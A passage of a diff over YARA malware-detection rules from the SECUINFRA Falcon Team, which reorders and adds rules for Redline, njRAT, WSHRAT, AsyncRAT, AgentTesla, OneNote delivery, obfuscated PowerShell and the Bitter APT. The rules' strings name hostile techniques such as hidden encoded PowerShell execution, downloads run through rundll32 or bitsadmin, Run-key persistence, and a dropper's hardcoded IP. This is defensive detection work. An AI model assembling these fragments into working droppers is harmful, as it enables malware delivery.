condition: + uint32be(0x0)==0xE4525C7B and 3 of them +} +rule SECUINFRA_SUSP_Powershell_Download_Temp_Rundll : POWERSHELL DOWNLOAD FILE { meta: - description = "Detects Certificate used by Redline Stealer" + description = "Detect a Download to %temp% and execution with rundll32.exe" author = "SECUINFRA Falcon Team" - id = "a91d0510-ab4e-5f22-bcce-9a42beff5190" - date = "2022-12-02" - modified = "2022-02-13" - reference = "https://bazaar.abuse.ch/sample/60e40ccfc16ca9f36dee7ec2b4e2fc81398ff408bf7cc63fb7ddf0fef1d4b72b" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Stealer/redline_stealer.yar#L3-L16" + id = "6b09a6f0-29c6-5baf-ae64-7aa49a37a9d3" + date = "2022-09-02" + modified = "2022-02-27" + reference = "https://github.com/SIFalcon/Detection" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/powershell.yar#L1-L17" license_url = "N/A" - logic_hash = "b3084bee5151543c0931bef9d320805d9e4d63c25be029da4e592d5a0b080a0e" - score = 75 + logic_hash = "4d7860dc94614b10bc0eea0189ad9b964399d4ee6404ebeaef40720c716c592d" + score = 65 quality = 70 - tags = "FILE" + tags = "POWERSHELL, DOWNLOAD, FILE" + + strings: + $location = "$Env:temp" nocase + $download = "downloadfile(" nocase + $rundll = "rundll32.exe" condition: - uint16(0)==0x5a4d and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].issuer contains "BOSCH BOSCH SDS-plus Professional 607557501" and pe.signatures[i].serial=="72:76:34:57:ef:50:d5:b0:4e:00:b3:74:ab:c6:ff:11") + filesize <100KB and $location and $download and $rundll } -import "pe" - -rule SECUINFRA_MAL_Redline_Certificate_Geforce : FILE +rule SECUINFRA_SUSP_Powershell_Base64_Decode : POWERSHELL B64 FILE { meta: - description = "Detects Certificate used by Redline Stealer" + description = "Detects PowerShell code to decode Base64 data. This can yield many FP" author = "SECUINFRA Falcon Team" - id = "70081810-704e-5734-8a78-f97e17989460" - date = "2022-02-13" - modified = "2022-02-13" - reference = "https://bazaar.abuse.ch/sample/f36c1c2f6b6f334be93b72fccb8e46cadd59304dc244b3a5aabecc8f4018eb77" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Stealer/redline_stealer.yar#L18-L31" + id = "7cb01c0b-d7e3-5196-b78d-f41765ba0368" + date = "2022-02-27" + modified = "2022-02-27" + reference = "https://github.com/SIFalcon/Detection" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/powershell.yar#L19-L31" license_url = "N/A" - logic_hash = "04e9bfd886be1550b0efd22f0098cc13a5fb6e7cae30b866a4066d0c8f433367" - score = 75 - quality = 70 - tags = "FILE" + logic_hash = "b323089ac61823d969d04a05890ad9fffe8589165d4b026b08e9fd633d4247de" + score = 60 + quality = 50 + tags = "POWERSHELL, B64, FILE" + + strings: + $b64_decode = "[System.Convert]::FromBase64String(" condition: - uint16(0)==0x5a4d and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].issuer contains "Palit GeForce RTX 3070 Dual H21 LHR" and pe.signatures[i].serial=="11:cd:b5:d5:9d:fb:90:84:45:f3:a7:22:25:47:a4:54") + filesize <500KB and $b64_decode +} +rule SECUINFRA_SUS_Unsigned_APPX_MSIX_Installer_Feb23 +{ + meta: + description = "Detects suspicious, unsigned Microsoft Windows APPX/MSIX Installer Packages" + author = "SECUINFRA Falcon Team (@SI_FalconTeam)" + id = "beaf08a8-a1c3-5d9c-b7cb-81a49c5bc2ec" + date = "2023-02-01" + modified = "2023-02-07" + reference = "https://twitter.com/SI_FalconTeam/status/1620500572481945600" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/SUS_Unsigned_APPX_MSIX_Installer_Feb23.yar#L1-L22" + license_url = "N/A" + logic_hash = "ad3f0545b2fe285adf67f053c8b422126a1bdff1b6835631280442495d975d16" + score = 50 + quality = 30 + tags = "" + tlp = "CLEAR" + + strings: + $s_manifest = "AppxManifest.xml" + $s_block = "AppxBlockMap.xml" + $s_peExt = ".exe" + $sig = "AppxSignature.p7x" + + condition: + uint16be(0x0)==0x504B and 2 of ($s*) and not $sig } import "pe" @@ -205753,6 +207569,33 @@ rule SECUINFRA_SUSP_Netsh_Firewall_Command : PE FILE condition: uint16(0)==0x5a4d and filesize <100KB and ($netsh_delete or $netsh_add) } +rule SECUINFRA_SUS_Unsigned_APPX_MSIX_Manifest_Feb23 +{ + meta: + description = "Detects suspicious Microsoft Windows APPX/MSIX Installer Manifests" + author = "SECUINFRA Falcon Team (@SI_FalconTeam)" + id = "f24f7e03-3cc5-5214-b6d2-205b69898636" + date = "2023-02-01" + modified = "2023-02-07" + reference = "https://twitter.com/SI_FalconTeam/status/1620500572481945600" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/SUS_Unsigned_APPX_MSIX_Manifest_Feb23.yar#L1-L25" + license_url = "N/A" + logic_hash = "4e3de25fdad9d76cefbb191424a739368b521c4f234656c397f4122debe749fa" + score = 65 + quality = 70 + tags = "" + tlp = "CLEAR" + + strings: + $xlmns = "http://schemas.microsoft.com/appx/manifest/" + $identity = "OID.2.25.311729368913984317654407730594956997722=1" + $s_entrypoint = "EntryPoint=\"Windows.FullTrustApplication\"" + $s_capability = "runFullTrust" + $s_peExt = ".exe" + + condition: + uint32be(0x0)==0x3C3F786D and $xlmns and $identity and 2 of ($s*) +} rule SECUINFRA_SUSP_LNK_Staging_Directory : FILE { meta: @@ -205776,189 +207619,237 @@ rule SECUINFRA_SUSP_LNK_Staging_Directory : FILE condition: filesize <20KB and ($header at 0) and $public } -rule SECUINFRA_SUS_Unsigned_APPX_MSIX_Installer_Feb23 +rule SECUINFRA_DROPPER_WSHRAT_Stage_1 : FILE { meta: - description = "Detects suspicious, unsigned Microsoft Windows APPX/MSIX Installer Packages" - author = "SECUINFRA Falcon Team (@SI_FalconTeam)" - id = "beaf08a8-a1c3-5d9c-b7cb-81a49c5bc2ec" - date = "2023-02-01" - modified = "2023-02-07" - reference = "https://twitter.com/SI_FalconTeam/status/1620500572481945600" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/SUS_Unsigned_APPX_MSIX_Installer_Feb23.yar#L1-L22" + description = "Detects the first stage of WSHRAT as obfuscated JavaScript" + author = "SECUINFRA Falcon Team" + id = "3bd363dc-3183-595e-931b-668eb17495f5" + date = "2022-11-02" + modified = "2022-02-27" + reference = "https://bazaar.abuse.ch/sample/ad24ae27346d930e75283b10d4b949a4986c18dbd5872a91f073334a08169a14/" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/wshrat.yar#L1-L18" license_url = "N/A" - logic_hash = "ad3f0545b2fe285adf67f053c8b422126a1bdff1b6835631280442495d975d16" - score = 50 - quality = 30 - tags = "" - tlp = "CLEAR" + hash = "793eff1b2039727e76fdd04300d44fc6" + logic_hash = "1390929d06bd1259dbab425fd4e953119f632be460f57756a0c226e9f510d75a" + score = 75 + quality = 70 + tags = "FILE" strings: - $s_manifest = "AppxManifest.xml" - $s_block = "AppxBlockMap.xml" - $s_peExt = ".exe" - $sig = "AppxSignature.p7x" + $a1 = "'var {0} = WS{1}teObject(\"ado{2}am\");" + $b1 = "String[\"prototype\"]" + $b2 = "this.replace(" + $b3 = "Array.prototype" condition: - uint16be(0x0)==0x504B and 2 of ($s*) and not $sig + filesize <1500KB and $a1 and #b3>3 and #b1>2 and $b2 } -rule SECUINFRA_SUS_Unsigned_APPX_MSIX_Manifest_Feb23 +rule SECUINFRA_DROPPER_Asyncrat_VBS_February_2022_1 : FILE { meta: - description = "Detects suspicious Microsoft Windows APPX/MSIX Installer Manifests" - author = "SECUINFRA Falcon Team (@SI_FalconTeam)" - id = "f24f7e03-3cc5-5214-b6d2-205b69898636" - date = "2023-02-01" - modified = "2023-02-07" - reference = "https://twitter.com/SI_FalconTeam/status/1620500572481945600" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/SUS_Unsigned_APPX_MSIX_Manifest_Feb23.yar#L1-L25" + description = "No description has been set in the source file - SecuInfra" + author = "SECUINFRA Falcon Team" + id = "80f84c2f-7af0-55c1-bc06-d605beae3e33" + date = "2022-02-21" + modified = "2022-02-21" + reference = "https://bazaar.abuse.ch/sample/06cd1e75f05d55ac1ea77ef7bee38bb3b748110b79128dab4c300f1796a2b941/" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/asyncrat.yar#L2-L18" license_url = "N/A" - logic_hash = "4e3de25fdad9d76cefbb191424a739368b521c4f234656c397f4122debe749fa" - score = 65 + logic_hash = "80c86b0cbb7382135bb9ae8c80ac42f499081fe1fe48fadf21f0e136bcc04358" + score = 75 quality = 70 - tags = "" - tlp = "CLEAR" + tags = "FILE" strings: - $xlmns = "http://schemas.microsoft.com/appx/manifest/" - $identity = "OID.2.25.311729368913984317654407730594956997722=1" - $s_entrypoint = "EntryPoint=\"Windows.FullTrustApplication\"" - $s_capability = "runFullTrust" - $s_peExt = ".exe" + $a1 = "http://3.145.46.6/" + $b1 = "Const HIDDEN_WINDOW = 0" + $b2 = "GetObject(\"winmgmts:\\\\" + $c = "replace(" condition: - uint32be(0x0)==0x3C3F786D and $xlmns and $identity and 2 of ($s*) + filesize <10KB and ($a1 or ( all of ($b*) and #c>10)) } -rule SECUINFRA_SUSP_Powershell_Download_Temp_Rundll_1 : POWERSHELL DOWNLOAD FILE +rule SECUINFRA_DROPPER_Njrat_VBS : VBS NJRAT DROPPER FILE { meta: - description = "Detect a Download to %temp% and execution with rundll32.exe" + description = "No description has been set in the source file - SecuInfra" author = "SECUINFRA Falcon Team" - id = "6b09a6f0-29c6-5baf-ae64-7aa49a37a9d3" - date = "2022-09-02" + id = "5296667a-2932-597e-8f49-b7fa755cb387" + date = "2022-02-27" modified = "2022-02-27" - reference = "https://github.com/SIFalcon/Detection" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/powershell.yar#L1-L17" + reference = "https://bazaar.abuse.ch/sample/daea0b5dfcc3e20b75292df60fe5f0e16a40735254485ff6cc7884697a007c0d/" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/njrat.yar#L2-L23" license_url = "N/A" - logic_hash = "4d7860dc94614b10bc0eea0189ad9b964399d4ee6404ebeaef40720c716c592d" - score = 65 + logic_hash = "7640be8850992ee7f05e85e1f781b4c63ccf958cf62da8deacfe9bb116627ceb" + score = 75 quality = 70 - tags = "POWERSHELL, DOWNLOAD, FILE" + tags = "VBS, NJRAT, DROPPER, FILE" strings: - $location = "$Env:temp" nocase - $download = "downloadfile(" nocase - $rundll = "rundll32.exe" + $a1 = "[System.Convert]::FromBase64String( $Codigo.replace(" wide + $a2 = "WDySjnçIJwGnYGadvbOQBvKzlNzWDDgUqgGlLKÇQvvkKPNjaUIdApxgqHTfDLUkfOKsXOKçDcQtltyXDXhNNbGNNPACgAzWRtuLt" wide + $b1 = "CreateObject(\"WScript.Shell\")" wide + $b2 = "\"R\" + \"e\" + \"p\" + \"l\" + \"a\" + \"c\" + \"e\"" wide + $b3 = "BBBB\" + \"BBBBBBB\" + \"BBBBBBB\" + \"BBBBBBBB" wide + $b4 = "& DGRP & NvWt & DGRP &" wide + $b5 = "= ogidoC$" wide condition: - filesize <100KB and $location and $download and $rundll + filesize <300KB and ((1 of ($a*)) or (2 of ($b*))) } -rule SECUINFRA_SUSP_Powershell_Base64_Decode : POWERSHELL B64 FILE +rule SECUINFRA_MAL_Agenttesla_Stage_1 : JAVASCRIPT AGENTTESLA OBFUSCATORIO FILE { meta: - description = "Detects PowerShell code to decode Base64 data. This can yield many FP" + description = "Detects the first stage of AgentTesla (JavaScript)" author = "SECUINFRA Falcon Team" - id = "7cb01c0b-d7e3-5196-b78d-f41765ba0368" + id = "0a098f27-8dbc-5749-9a0d-fd0198184c7a" date = "2022-02-27" modified = "2022-02-27" - reference = "https://github.com/SIFalcon/Detection" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/powershell.yar#L19-L31" + reference = "https://bazaar.abuse.ch/sample/bd257d674778100639b298ea35550bf3bcb8b518978c502453e9839846f9bbec/" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/agent_tesla.yar#L1-L18" license_url = "N/A" - logic_hash = "b323089ac61823d969d04a05890ad9fffe8589165d4b026b08e9fd633d4247de" - score = 60 - quality = 50 - tags = "POWERSHELL, B64, FILE" + hash = "bd257d674778100639b298ea35550bf3bcb8b518978c502453e9839846f9bbec" + logic_hash = "7c21f80a02aa161ffb2edf47aff796f22aff2a563abcb0097cc86371c05e516d" + score = 75 + quality = 45 + tags = "JAVASCRIPT, AGENTTESLA, OBFUSCATORIO, FILE" strings: - $b64_decode = "[System.Convert]::FromBase64String(" + $mz = "TVq" + $a1 = ".jar" + $a2 = "bin.base64" + $a3 = "appdata" + $a4 = "skype.exe" condition: - filesize <500KB and $b64_decode + filesize <500KB and $mz and 3 of ($a*) } -rule SECUINFRA_MALWARE_Onenote_Delivery_Jan23 +rule SECUINFRA_DROPPER_Valyria_Stage_1 : JAVASCRIPT VBS VALYRIA FILE { meta: - description = "Detects suspicious Microsoft OneNote files used to deliver Malware" - author = "SECUINFRA Falcon Team (@SI_FalconTeam)" - id = "ebf02a11-6f53-573d-bd7a-9948cef9fb3a" - date = "2023-01-19" - modified = "2023-01-19" - reference = "https://twitter.com/James_inthe_box/status/1615421130877329409" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/MALWARE_OneNote_Delivery_Jan23.yar#L1-L56" + description = "Family was taken from VirusTotal" + author = "SECUINFRA Falcon Team" + id = "7e2ab9db-142c-5dee-92b7-4a70d747c540" + date = "2022-02-18" + modified = "2022-02-18" + reference = "https://bazaar.abuse.ch/sample/c8a8fea3cbe08cd97e56a0e0dbc59a892f8ab1ff3b5217ca3c9b326eeee6ca66/" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/valyria.yar#L1-L23" license_url = "N/A" - logic_hash = "08c38eedf500fd1a0224e396b41aebb8ac82b3705321ca798ac1007ea34366e1" - score = 65 - quality = 66 - tags = "" - tlp = "CLEAR" - hash0 = "18af397a27e58afb901c92f37569d48e3372cf073915723e4e73d44537bcf54d" - hash1 = "de30f2ba2d8916db5ce398ed580714e2a8e75376f31dc346b0e3c898ee0ae4cf" - hash2 = "bfc979c0146d792283f825f99772370f6ff294dfb5b1e056943696aee9bc9f7b" - hash3 = "e0d9f2a72d64108a93e0cfd8066c04ed8eabe2ed43b80b3f589b9b21e7f9a488" - hash4 = "3f00a56cbf9a0e59309f395a6a0b3457c7675a657b3e091d1a9440bd17963f59" + logic_hash = "94643123a4be26c818d43a77b907edf8651d306463f4df750db67cef790f10eb" + score = 75 + quality = 70 + tags = "JAVASCRIPT, VBS, VALYRIA, FILE" strings: - $hta = "hta:application" nocase - $script1 = "type=\"text/vbscript\"" - $script2 = "language=\"VBScript\"" - $powershell = "powershell" nocase - $startProc = "Start-Process -Filepath" - $webReq = "Invoke-WebRequest -Uri" - $bitsadmin = "bitsadmin /transfer" - $wscript = "WScript.Shell" nocase - $autoOpen = "Sub AutoOpen()" - $root = "GetObject(\"winmgmts:\\.\\root\\cimv2\")" - $wsfExt = ".wsf" ascii wide - $vbsExt = ".vbs" ascii wide - $cmd = "cmd /c" nocase - $batch = "@echo off" - $batExt = ".bat" ascii wide - $delExit = "(goto) 2>nul & del \"%~f0\"..exit /b" - $dosString = "!This program cannot be run in DOS mode" - $exeExt = ".exe" ascii wide - $imageFile = "button_click-to-view-document.png" wide - $click = "click to view document" nocase wide - $path1 = "C:\\Users\\My\\OneDrive\\Desktop" wide - $path2 = "C:\\Users\\Administrator\\Documents\\Dove" wide - $path3 = "C:\\Users\\julien.galleron\\Downloads" wide + $a1 = "<script language=\"vbscript\">" + $a2 = "<script language=\"javascript\">" + $b1 = "window.resizeTo(0,0);" + $b2 = ".Environment" + $b3 = ".item().Name" + $b4 = "v4.0.30319" + $b5 = "v2.0.50727" + $c1 = "Content Writing.docx" + $c2 = "eval" condition: - uint32be(0x0)==0xE4525C7B and 3 of them + filesize <600KB and all of ($a*) and 3 of ($b*) and 1 of ($c*) } -import "pe" +rule SECUINFRA_DROPPER_Unknown_1 : DROPPER HTA FILE +{ + meta: + description = "Detects unknown HTA Dropper" + author = "SECUINFRA Falcon Team" + id = "70c06b9d-8474-5b6e-bd9c-d45a25585ee9" + date = "2022-10-02" + modified = "2022-02-19" + reference = "https://bazaar.abuse.ch/sample/c2bf8931028e0a18eeb8f1a958ade0ab9d64a00c16f72c1a3459f160f0761348/" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/unknown.yar#L1-L21" + license_url = "N/A" + hash = "1749f4127bba3f7204710286b1252e14" + logic_hash = "d02874514bcb6c3603d1bfee702ec9e18c15153bc14a55ca8d637308c3f35a75" + score = 75 + quality = 43 + tags = "DROPPER, HTA, FILE" -rule SECUINFRA_MAL_Njrat : FILE + strings: + $a1 = "<script type=\"text/vbscript\" LANGUAGE=\"VBScript\" >" + $a2 = "Function XmlTime(t)" + $a3 = "C:\\ProgramData\\" + $a4 = "wscript.exe" + $a5 = "Array" nocase + $b = "chr" nocase + + condition: + filesize <70KB and all of ($a*) and #b>7 +} +rule SECUINFRA_DROPPER_Vjw0Rm_Stage_1 : JAVASCRIPT DROPPER VJW0RM FILE { meta: description = "No description has been set in the source file - SecuInfra" author = "SECUINFRA Falcon Team" - id = "eeea8bcf-0d19-5c43-92cc-55c1110f46e5" - date = "2022-02-27" + id = "a07f80e4-56c3-5b75-be64-648bc1fde964" + date = "2022-02-19" modified = "2022-02-27" - reference = "https://github.com/SIFalcon/Detection" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/RAT/njrat.yar#L3-L35" + reference = "https://bazaar.abuse.ch/browse.php?search=tag%3AVjw0rm" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/Vjw0rm.yar#L2-L19" license_url = "N/A" - logic_hash = "e6f5ce20df70bc2f9d00931a84db08c1918a0639555204de8e86f3ba583a73f5" + logic_hash = "e5cc23431239e8a650369729050809cf6fe2acc58941086f79ce004b4f506eed" + score = 75 + quality = 20 + tags = "JAVASCRIPT, DROPPER, VJW0RM, FILE" + version = "0.1" + + strings: + $a1 = "$$$" + $a2 = "microsoft.xmldom" + $a3 = "eval" + $a4 = "join(\"\")" + + condition: + ( uint16(0)==0x7566 or uint16(0)==0x6176 or uint16(0)==0x0a0d or uint16(0)==0x660a) and filesize <60KB and all of ($a*) +} +import "pe" + +rule SECUINFRA_MAL_Redline_Certificate_Bosch : FILE +{ + meta: + description = "Detects Certificate used by Redline Stealer" + author = "SECUINFRA Falcon Team" + id = "a91d0510-ab4e-5f22-bcce-9a42beff5190" + date = "2022-12-02" + modified = "2022-02-13" + reference = "https://bazaar.abuse.ch/sample/60e40ccfc16ca9f36dee7ec2b4e2fc81398ff408bf7cc63fb7ddf0fef1d4b72b" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Stealer/redline_stealer.yar#L3-L16" + license_url = "N/A" + logic_hash = "b3084bee5151543c0931bef9d320805d9e4d63c25be029da4e592d5a0b080a0e" score = 75 quality = 70 tags = "FILE" - hash_1 = "38928ae157586ec7785121f79ac5f9eb6727eae66aa512d8adf52d9485928126" - hash_2 = "fcfa50ca0d4dcf2bb6e96e7b7a223138068f2d6a458d2630757e3bcbe0684aaa" - hash_3 = "fa28ad86ab796c8e18096badc31bcb1719474d268945172d983bb30ded219944" - strings: - $mutex_1 = "02ddd2742fd5023579c925948979506c" wide - $mutex_2 = "f2defcfce1660e18fd445b5dbce27282" wide - $mutex_3 = "f7d3b79624476341312866012d0bbf19" wide - $a1 = "\"|'|'|\"" wide - $a2 = "SEE_MASK_NOZONECHECKS" wide - $b1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide - $b2 = "netsh firewall" wide - $b3 = "[ENTER]\\r\\n" wide - $b4 = "Execute ERROR" wide + condition: + uint16(0)==0x5a4d and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].issuer contains "BOSCH BOSCH SDS-plus Professional 607557501" and pe.signatures[i].serial=="72:76:34:57:ef:50:d5:b0:4e:00:b3:74:ab:c6:ff:11") +} +import "pe" + +rule SECUINFRA_MAL_Redline_Certificate_Geforce : FILE +{ + meta: + description = "Detects Certificate used by Redline Stealer" + author = "SECUINFRA Falcon Team" + id = "70081810-704e-5734-8a78-f97e17989460" + date = "2022-02-13" + modified = "2022-02-13" + reference = "https://bazaar.abuse.ch/sample/f36c1c2f6b6f334be93b72fccb8e46cadd59304dc244b3a5aabecc8f4018eb77" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Stealer/redline_stealer.yar#L18-L31" + license_url = "N/A" + logic_hash = "04e9bfd886be1550b0efd22f0098cc13a5fb6e7cae30b866a4066d0c8f433367" + score = 75 + quality = 70 + tags = "FILE" condition: - uint16(0)==0x5a4d and filesize <100KB and pe.imports("mscoree.dll") and pe.imports("avicap32.dll") and 1 of ($mutex_*) or (1 of ($a*) and 2 of ($b*)) + uint16(0)==0x5a4d and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].issuer contains "Palit GeForce RTX 3070 Dual H21 LHR" and pe.signatures[i].serial=="11:cd:b5:d5:9d:fb:90:84:45:f3:a7:22:25:47:a4:54") } rule SECUINFRA_MAL_WSHRAT : RAT JAVASCRIPT WSHRAT FILE { @@ -206011,6 +207902,41 @@ rule SECUINFRA_MAL_WSHRAT : RAT JAVASCRIPT WSHRAT FILE condition: filesize <2MB and 2 of ($cmd*) and 12 of ($function*) } +import "pe" + +rule SECUINFRA_MAL_Njrat : FILE +{ + meta: + description = "No description has been set in the source file - SecuInfra" + author = "SECUINFRA Falcon Team" + id = "eeea8bcf-0d19-5c43-92cc-55c1110f46e5" + date = "2022-02-27" + modified = "2022-02-27" + reference = "https://github.com/SIFalcon/Detection" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/RAT/njrat.yar#L3-L35" + license_url = "N/A" + logic_hash = "e6f5ce20df70bc2f9d00931a84db08c1918a0639555204de8e86f3ba583a73f5" + score = 75 + quality = 70 + tags = "FILE" + hash_1 = "38928ae157586ec7785121f79ac5f9eb6727eae66aa512d8adf52d9485928126" + hash_2 = "fcfa50ca0d4dcf2bb6e96e7b7a223138068f2d6a458d2630757e3bcbe0684aaa" + hash_3 = "fa28ad86ab796c8e18096badc31bcb1719474d268945172d983bb30ded219944" + + strings: + $mutex_1 = "02ddd2742fd5023579c925948979506c" wide + $mutex_2 = "f2defcfce1660e18fd445b5dbce27282" wide + $mutex_3 = "f7d3b79624476341312866012d0bbf19" wide + $a1 = "\"|'|'|\"" wide + $a2 = "SEE_MASK_NOZONECHECKS" wide + $b1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide + $b2 = "netsh firewall" wide + $b3 = "[ENTER]\\r\\n" wide + $b4 = "Execute ERROR" wide + + condition: + uint16(0)==0x5a4d and filesize <100KB and pe.imports("mscoree.dll") and pe.imports("avicap32.dll") and 1 of ($mutex_*) or (1 of ($a*) and 2 of ($b*)) +} rule SECUINFRA_MAL_Nw0Rm : FILE { meta: @@ -206041,189 +207967,131 @@ rule SECUINFRA_MAL_Nw0Rm : FILE condition: uint16(0)==0x5a4d and 2 of ($a*) and 2 of ($b*) } -import "console" - -rule SECUINFRA_HUNT_RTF_CVE_2023_21716_Mar23 : CVE_2023_21716 -{ - meta: - description = "Detects RTF documents with an inflated fonttable. Hunting for CVE-2023-21716" - author = "SECUINFRA Falcon Team (@SI_FalconTeam)" - id = "1b76f428-f2a8-5d1d-a78c-b4a70ac4f5db" - date = "2023-03-07" - modified = "2023-03-07" - reference = "https://www.bleepingcomputer.com/news/security/proof-of-concept-released-for-critical-microsoft-word-rce-bug/" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Hunting/HUNT_RTF_CVE_2023_21716.yar#L3-L20" - license_url = "N/A" - logic_hash = "456008db725b8348f9f3851bb9aae9990e7613e1b9056846b121605c3e080297" - score = 50 - quality = 70 - tags = "CVE-2023-21716" - tlp = "CLEAR" - - strings: - $fonttbl_len = /\\fonttbl\{.{1,10}\;\}(\s.{1,10}\}){10,}/ - - condition: - uint32be(0x0)==0x7B5C7274 and !fonttbl_len[1]>256 and console.log("[!] Inflated fonttable with length: ",!fonttbl_len[1]) -} -import "pe" -import "dotnet" - -rule SECUINFRA_APT_Bitter_Maldoc_Verify : CVE_2018_0798 +rule SECUINFRA_OBFUS_Powershell_Execution : FILE { meta: - description = "Detects Bitter (T-APT-17) shellcode in oleObject (CVE-2018-0798)" - author = "SECUINFRA Falcon Team (@SI_FalconTeam)" - id = "8e0e32d3-f00e-5145-9386-f42ddca703ae" - date = "2022-06-01" - modified = "2022-07-05" - reference = "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/APT/APT_Bitter_T-APT-17.yar#L11-L40" + description = "Detects some variations of obfuscated PowerShell code to execute further PowerShell code" + author = "SECUINFRA Falcon Team" + id = "b32c2a92-599c-5916-a335-dc996dcdc1bf" + date = "2022-09-02" + modified = "2022-02-27" + reference = "https://github.com/SIFalcon/Detection" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Obfuscation/powershell_obfuscation.yar#L1-L17" license_url = "N/A" - logic_hash = "1d30e2ad0d99d274a4e3dd029ff41ec05e8ba4160bea37762bce1bb5286493d8" + logic_hash = "b201774edc4a20a0035cd68898a785a6c2fc03fb8739d515196e428d4a88af70" score = 75 quality = 70 - tags = "CVE-2018-0798" - tlp = "WHITE" - hash0 = "0c7158f9fc2093caf5ea1e34d8b8fffce0780ffd25191fac9c9b52c3208bc450" - hash1 = "bd0d25194634b2c74188cfa3be6668590e564e6fe26a6fe3335f95cbc943ce1d" - hash2 = "3992d5a725126952f61b27d43bd4e03afa5fa4a694dca7cf8bbf555448795cd6" + tags = "FILE" strings: - $xor_string0 = "LoadLibraryA" xor - $xor_string1 = "urlmon.dll" xor - $xor_string2 = "Shell32.dll" xor - $xor_string3 = "ShellExecuteA" xor - $xor_string4 = "MoveFileA" xor - $xor_string5 = "CreateDirectoryA" xor - $xor_string6 = "C:\\Windows\\explorer" xor - $padding = {000001128341000001128341000001128342000001128342} + $a1 = "-nop -w hiddEn -Ep bypass -Enc" ascii nocase + $a2 = "-noP -sta -w 1 -enc" ascii nocase + $b1 = "SQBFAF" condition: - 3 of ($xor_string*) and $padding + filesize <300KB and $b1 and 1 of ($a*) } -import "pe" -import "dotnet" - -rule SECUINFRA_APT_Bitter_Almond_RAT : FILE +rule SECUINFRA_OBFUS_Powershell_Replace_Tilde : FILE { meta: - description = "Detects Bitter (T-APT-17) Almond RAT (.NET)" - author = "SECUINFRA Falcon Team (@SI_FalconTeam)" - id = "191fadf9-4f64-56c9-bc2a-a7b4e27ab0fc" - date = "2022-06-01" - modified = "2022-07-05" - reference = " https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/APT/APT_Bitter_T-APT-17.yar#L82-L108" + description = "Detects usage of Replace to replace tilde. Often observed in obfuscation" + author = "SECUINFRA Falcon Team" + id = "59b68982-01ae-588a-9802-bb92c72342a8" + date = "2022-10-02" + modified = "2022-02-27" + reference = "https://bazaar.abuse.ch/sample/4c391b57d604c695925938bfc10ceb4673edd64e9655759c2aead9e12b3e17cf/" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Obfuscation/powershell_obfuscation.yar#L19-L32" license_url = "N/A" - hash = "55901c2d5489d6ac5a0671971d29a31f4cdfa2e03d56e18c1585d78547a26396" - logic_hash = "b8d6b95987fe434fc16c87a7bc144f1fe69301a32bb93588df7c2abbfef62d75" + logic_hash = "a2693757f9aedc1019a94a15ae00f87af852d319aa698dadd7f9bb98128622a0" score = 75 quality = 70 tags = "FILE" - tlp = "WHITE" strings: - $function0 = "GetMacid" ascii - $function1 = 